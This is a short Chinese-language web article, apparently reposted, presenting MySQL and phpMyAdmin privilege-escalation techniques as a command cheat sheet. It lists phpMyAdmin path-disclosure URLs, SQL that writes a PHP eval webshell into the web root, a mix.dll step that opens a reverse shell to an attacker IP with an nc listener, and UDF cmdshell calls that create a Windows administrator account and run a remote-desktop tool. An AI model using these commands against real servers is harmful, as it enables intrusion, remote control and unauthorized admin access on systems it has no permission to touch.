Mysql+PHPmyadmin 提權(quán)技巧
發(fā)表時(shí)間:2023-05-31 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]1:phpmyadmin 后臺拿webshell phpmyadmin爆路徑方法: weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php...
1:phpmyadmin 后臺拿webshell
phpmyadmin爆路徑方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
hpmyadmin\themes\darkblue_orange\layout.inc.php
D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
----end code---
2:mix.dll提權(quán)
D:/usr/www/html/mix.dll
mysql -h 目標(biāo)ip -uroot -p
\. c:\mysql.txt
select Mixconnect('反彈ip','端口');
nc -vv -l -p 1983
3:udf.dll提權(quán)
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('c:\3389.exe');
drop function cmdshell; 刪除函數(shù)
select cmdshell('netstat -an');
load data infile "d:\\www\\gb\\about\\about.htm" into table tmp;
判斷文件存不存在mysql的語句
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費(fèi)電腦中毒的煩擾。